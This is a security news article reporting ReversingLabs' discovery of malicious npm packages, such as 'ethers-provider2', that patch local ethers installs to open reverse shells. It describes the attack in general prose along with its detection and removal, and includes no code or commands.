A newly discovered malware campaign has leveraged malicious npm packages to deliver highly sophisticated reverse shells.
Researchers at ReversingLabs identified two malicious packages, “ethers-provider2” and “ethers-providerz,” which infiltrated development environments by covertly modifying legitimate npm dependencies.
The ethers-provider2 package closely mimics the legitimate ssh2 package, embedding harmful code within its installation script. Upon execution, the script downloads a second-stage payload from an external server, executing it before erasing any traces of the download.
This payload continuously monitors for the installation of the legitimate ethers package and, once detected, replaces a key file with a compromised version that retrieves a third-stage payload. Finally, it establishes a reverse shell connection to the attacker’s server.
Similarly, ethers-providerz attempts to patch files within @ethersproject/providers, but researchers noted that the malicious code contains incorrect file paths, which suggests incomplete implementation. Despite these flaws, the intent remained clear: infect commonly used npm packages with hidden backdoors.
Stealth and Persistence in npm Malware
Unlike typical npm-based malware, these packages ensure that removing the infected npm package does not eliminate its impact. If the ethers package is reinstalled after ethers-provider2 has been executed, the malicious modifications will be reintroduced, allowing continued access for the attackers.
These findings highlight the increasing sophistication of software supply chain attacks. While infostealers remain a common threat in the npm ecosystem, this campaign demonstrates an evolution in attacker tactics, focusing on long-term persistence and stealth.
Notably, the malicious code was only injected into locally installed npm packages – there was no compromise of the official ethers package.
Detection and Response
ReversingLabs detected these packages using its Spectra platform, which flagged the modified installation scripts as suspicious. Despite low download numbers, the company warned that the risk remains substantial, particularly if such tactics are used against more popular npm packages in future attacks.
The ethers-providerz package has since been removed from npm, while ethers-provider2 remains available at the time of writing.
To mitigate the risk, ReversingLabs developed a YARA rule to identify systems where the ethers package has been modified.
Further investigation uncovered additional related packages, “reproduction-hardhat” and “@theoretical123/providers,” both removed from npm after researchers reported their malicious behavior.
“This latest campaign is evidence that the risk of downloading malware and compromising development environments and networks remains high, while novel ways of serving malicious payloads are emerging.” ReversingLabs wrote.
“What is even more ominous with this current threat: Even if the malicious package ethers-provider2 is removed, the threat actors made sure their malicious functionality would persist. This highlights the importance of being alert to supply chain threats and attacks since there are many malicious packages lurking on npm, serving malware in novel and not-so-novel ways.”